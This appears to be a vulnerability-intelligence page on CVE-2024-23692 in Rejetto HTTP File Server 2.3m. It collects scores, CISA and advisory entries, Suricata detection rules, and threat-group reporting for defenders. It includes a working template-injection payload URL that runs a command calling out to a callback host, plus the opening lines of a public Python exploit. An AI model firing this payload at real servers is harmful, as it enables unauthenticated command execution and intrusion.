CVE-2024-23692
published 2024-05-31CVE-2024-23692: Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote…
PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2024-07-30
Exploited in the wild
EPSS
99.48%
99.9th percentile
Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rejetto | http_file_server | <= 2.4 | — |
Detection & IOCsextracted from sources · hover to see the quote
url{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
othershodan:product:"HttpFileServer httpd"
- →Exploit requests use HTTP GET with template injection payload in query parameters; look for URL-encoded newlines (%0A) and HFS macro syntax (e.g., {.exec|...}) in the query string targeting the HFS root path.
- →HATVIBE C2 communication uses HTTP PUT requests; monitor for anomalous PUT traffic from hosts running HFS to the listed C2 IPs/domains. ↗
- →Detect HATVIBE persistence via scheduled tasks spawning mshta.exe; alert on scheduled task creation invoking mshta.exe on Windows hosts. ↗
- →Nuclei template matcher checks HTTP response body for the string 'rejetto' as a confirmation of successful exploitation; use this as a detection signal in HTTP response inspection.
- →Insikt Group provides Snort and YARA rules for HATVIBE and CHERRYSPY; deploy these rules in IDS/IPS for network and host-based detection of TAG-110 tooling delivered via CVE-2024-23692 exploitation. ↗
- ·The Nuclei template uses an out-of-band DNS interaction (interactsh) as the primary matcher; the exploit payload requires a live interactsh callback to confirm RCE and will not fire in air-gapped or DNS-blocked environments.
- ·The exploit sets a 15-second execution timeout for the injected command; detections relying on response timing or content may miss executions that exceed this window.
- ·The C2 IPs and domains listed are associated with TAG-110's broader HATVIBE/CHERRYSPY campaign and are not exclusively tied to CVE-2024-23692 exploitation; they should be used as campaign-level indicators rather than exploit-specific ones. ↗
- ·Rejetto HFS 2.3m is no longer supported; no patch exists for the 2.x branch. The only remediation is migration to HFS version 3. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-cw5c-xm7f-wx63: Rejetto HTTP File Server, up to and including version 2
ghsa_unreviewed·2024-05-31
CVE-2024-23692 [CRITICAL] CWE-1336 GHSA-cw5c-xm7f-wx63: Rejetto HTTP File Server, up to and including version 2
Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.
VulnCheck
Rejetto HTTP File Server Improper Neutralization of Special Elements Used in a Template Engine Vulnerability
vulncheck·2024·CVSS 9.8
CVE-2024-23692 [CRITICAL] CWE-1336 Rejetto HTTP File Server Improper Neutralization of Special Elements Used in a Template Engine Vulnerability
Rejetto HTTP File Server Improper Neutralization of Special Elements Used in a Template Engine Vulnerability
Rejetto HTTP File Server contains an improper neutralization of special elements used in a template engine vulnerability. This allows a remote, unauthenticated attacker to execute commands on the affected system by sending a specially crafted HTTP request.
Affected: Rejetto HTTP File Server
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://asec.ahnlab.com/ko/67509/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://cert.gov.ua/article/6280129; https://www.f5.com/labs/articles/threat-intelligen
CISA
Rejetto HTTP File Server Improper Neutralization of Special Elements Used in a Template Engine Vulnerability
cisa·2024-07-09·CVSS 9.8
CVE-2024-23692 [CRITICAL] CWE-1336 Rejetto HTTP File Server Improper Neutralization of Special Elements Used in a Template Engine Vulnerability
Vulnerability: Rejetto HTTP File Server Improper Neutralization of Special Elements Used in a Template Engine Vulnerability
Affected: Rejetto HTTP File Server
Rejetto HTTP File Server contains an improper neutralization of special elements used in a template engine vulnerability. This allows a remote, unauthenticated attacker to execute commands on the affected system by sending a specially crafted HTTP request.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: The patched Rejetto HTTP File Server (HFS) is version 3: https://github.com/rejetto/hfs?tab=readme-ov-file#installation, https://www.rejetto.com/hfs/ ; https://nvd.nist.gov/vuln/detail/CVE-2024-23692
Remediation Due Date: 2024-07-30
Suricata
ET WEB_SPECIFIC_APPS Rejetto HTTP File Server Template Injection (CVE-2024-23692)
suricata·2024-10-23·CVSS 9.8
CVE-2024-23692 [CRITICAL] ET WEB_SPECIFIC_APPS Rejetto HTTP File Server Template Injection (CVE-2024-23692)
ET WEB_SPECIFIC_APPS Rejetto HTTP File Server Template Injection (CVE-2024-23692)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Rejetto HTTP File Server Template Injection (CVE-2024-23692)"; flow:established,to_server; pcre:"/^(?:GET|POST)$/M"; http.uri; content:"/?"; content:"cmd|3d|"; fast_pattern; content:"search|3d|"; pcre:"/^[^\x26]*?(?:\x7b|\x24|\x23|\x7e|\x40|\x2a|\x25|\x5f|\x3c|T)(?:\x7b\x3d?|\x28|\x5b|\x25|\x23|\x28\x3d?|\x2e)/R"; reference:url,mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/; reference:cve,2024-23692; classtype:web-application-attack; sid:2056776; rev:1; metadata:affected_product Rejetto, attack_target Server, tls_state TLSDecrypt, created_at 2024_10_23, cve CVE_2024_23692, deployment Perimeter, deployment Internal, deplo
Suricata
ET EXPLOIT Rejetto HTTP File Server Unauthenticated RCE Attempt (CVE-2024-23692)
suricata·2024-07-10·CVSS 9.8
CVE-2024-23692 [CRITICAL] ET EXPLOIT Rejetto HTTP File Server Unauthenticated RCE Attempt (CVE-2024-23692)
ET EXPLOIT Rejetto HTTP File Server Unauthenticated RCE Attempt (CVE-2024-23692)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Rejetto HTTP File Server Unauthenticated RCE Attempt (CVE-2024-23692)"; flow:established,to_server; http.method; content:"GET"; http.uri.raw; content:"/?search=%"; fast_pattern; content:"|7d 7b 2e|"; reference:cve,2024-23692; reference:url,github.com/jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS/blob/master/exploit.py; classtype:attempted-admin; sid:2054424; rev:1; metadata:attack_target Server, created_at 2024_07_10, cve CVE_2024_23692, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_07_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_tec
Exploit-DB
Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
exploitdb·2025-03-28·CVSS 9.8
CVE-2024-23692 [CRITICAL] Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
---
# Exploit Title: Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
# Fofa Dork: "HttpFileServer" && server=="HFS 2.3m"
# Date: 2024-09-22
# Exploit Author: VeryLazyTech
# GitHub: https://github.com/verylazytech/CVE-2024-23692
# Vendor Homepage: http://rejetto.com/hfs/
# Software Link: http://rejetto.com/hfs/
# Version: 2.3m
# Tested on: Windows 10
# CVE: CVE-2024-23692
import requests
import random
import argparse
from colorama import Fore, Style
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [green, cyan, blue]
random_color = random.choice(colors)
Nuclei
Rejetto HTTP File Server - Template injection
nuclei·CVSS 9.8
CVE-2024-23692 [CRITICAL] Rejetto HTTP File Server - Template injection
Rejetto HTTP File Server - Template injection
This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request.
Template:
id: CVE-2024-23692
info:
name: Rejetto HTTP File Server - Template injection
author: johnk3r
severity: critical
description: |
This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request.
impact: |
Unauthenticated attackers can execute arbitrary commands on the Rejetto HTTP File Server through template injection, potentially compromising the entire system.
remediation: |
Update Rejetto HTTP File Server to a version newer than 2.3m.
reference:
- https://github.com/rapid7/metasplo
Metasploit
Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution
metasploit
Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution
Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution
The Rejetto HTTP File Server (HFS) version 2.x is vulnerable to an unauthenticated server side template injection (SSTI) vulnerability. A remote unauthenticated attacker can execute code with the privileges of the user account running the HFS.exe server process. This exploit has been tested to work against version 2.4.0 RC7 and 2.3m. The Rejetto HTTP File Server (HFS) version 2.x is no longer supported by the maintainers and no patch is available. Users are recommended to upgrade to newer supported versions.
Greynoiseio
NoiseLetter June 2024
blogs_greynoiseio
NoiseLetter June 2024
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Recorded Future
Russia-Aligned TAG-110 Targets Asia and Europe with HATVIBE and CHERRYSPY
blogs_recorded_future
Russia-Aligned TAG-110 Targets Asia and Europe with HATVIBE and CHERRYSPY
# Russia-Aligned TAG-110 Targets Asia and Europe with HATVIBE and CHERRYSPY
Summary
Insikt Group has identified an ongoing cyber-espionage campaign conducted by TAG-110, a Russia-aligned threat group targeting organizations in Central Asia, East Asia, and Europe. Using custom malware tools HATVIBE and CHERRYSPY, TAG-110 primarily attacks government entities, human rights groups, and educational institutions. The campaign’s tactics align with the historical activities of UAC-0063, attributed to Russian APT group BlueDelta (APT28). HATVIBE functions as a loader to deploy CHERRYSPY, a Python backdoor used for data exfiltration and espionage. Initial access is often achieved through phishing emails or exploiting vulnerable web-facing services like Rejetto HTTP File Server.
TAG-110’s efforts
Recorded Future
Russia-Aligned TAG-110 Targets Asia and Europe with HATVIBE and CHERRYSPY
blogs_recorded_future
Russia-Aligned TAG-110 Targets Asia and Europe with HATVIBE and CHERRYSPY
## Russia-Aligned TAG-110 Targets Asia and Europe with HATVIBE and CHERRYSPY
Summary
Insikt Group has identified an ongoing cyber-espionage campaign conducted by TAG-110, a Russia-aligned threat group targeting organizations in Central Asia, East Asia, and Europe. Using custom malware tools HATVIBE and CHERRYSPY, TAG-110 primarily attacks government entities, human rights groups, and educational institutions. The campaign’s tactics align with the historical activities of UAC-0063, attributed to Russian APT group BlueDelta (APT28). HATVIBE functions as a loader to deploy CHERRYSPY, a Python backdoor used for data exfiltration and espionage. Initial access is often achieved through phishing emails or exploiting vulnerable web-facing services like Rejetto HTTP File Server.
TAG-110’s effort
https://github.com/rapid7/metasploit-framework/pull/19240https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/https://vulncheck.com/advisories/rejetto-unauth-rcehttps://github.com/rapid7/metasploit-framework/pull/19240https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/https://vulncheck.com/advisories/rejetto-unauth-rcehttps://www.vicarius.io/vsociety/posts/cve-2024-23692-detect-rejetto-hfs-vulnerabilityhttps://www.vicarius.io/vsociety/posts/cve-2024-23692-rejetto-hfs-mitigate-vulnerabilityhttps://www.vicarius.io/vsociety/posts/unauthenticated-rce-flaw-in-rejetto-http-file-server-cve-2024-23692https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-23692
2024-05-31
Published
2024-07-09
Added to CISA KEV
Exploited in the wild